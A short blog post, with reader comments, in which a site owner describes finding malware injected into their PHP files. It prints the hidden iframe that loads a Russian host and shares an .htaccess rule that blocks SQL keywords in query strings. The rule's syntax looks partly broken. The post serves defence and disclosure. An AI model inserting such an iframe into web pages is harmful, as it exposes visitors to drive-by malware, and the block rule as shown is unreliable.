in Scripting, Security

Html Injection

malware
Yesterday I got a message from google about my adwords account having been suspended. Reason being a suspected malware infection on my site. I Then checked my site code and realised that yes i had been compromised the code below had somehow been added to my php files:

<div style=”display:none”><iframe width=415 height=797 src=”http://age-inf.ru:8080/index.php” ></iframe></div><div style=”display:none”></div><div style=”display:none”>

From the above, it seems this loads a page in the background within an iframe without the users consent, i dont even want to know what happens when you load that url. Anyway for those of you who might find themselves in a similar situation, I managed to solve this by altering my .htaccess file and adding the contents below to it:

RewriteCond %{QUERY_STRING} ^.*(;|<|>|’|”|)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* – [F]

Some people are suggesting playing around with mod_rewrite but I’m not too sure if thats the safest way to deal with it. One question remains, how was the html injected in the first place?

  • Bava

    If your website is infected, cleaning it manually would be really difficult for large websites. Here is one site that gives detailed technical information and some automated removal procedure as well:

    http://paramprojects.com/website/badwarefaq

  • Tk

    Usually by inserting code that tricks your PHP into ‘including’ a foreign file (if http wrapper is enabled), either that or SQL injection; which happens when you do not properly escape all HTTP vars (I see your .htaccess rule blocks SQL statements). The alternative to escaping HTTP vars is to use parametric SQL statements with the new mssqli/mysqli API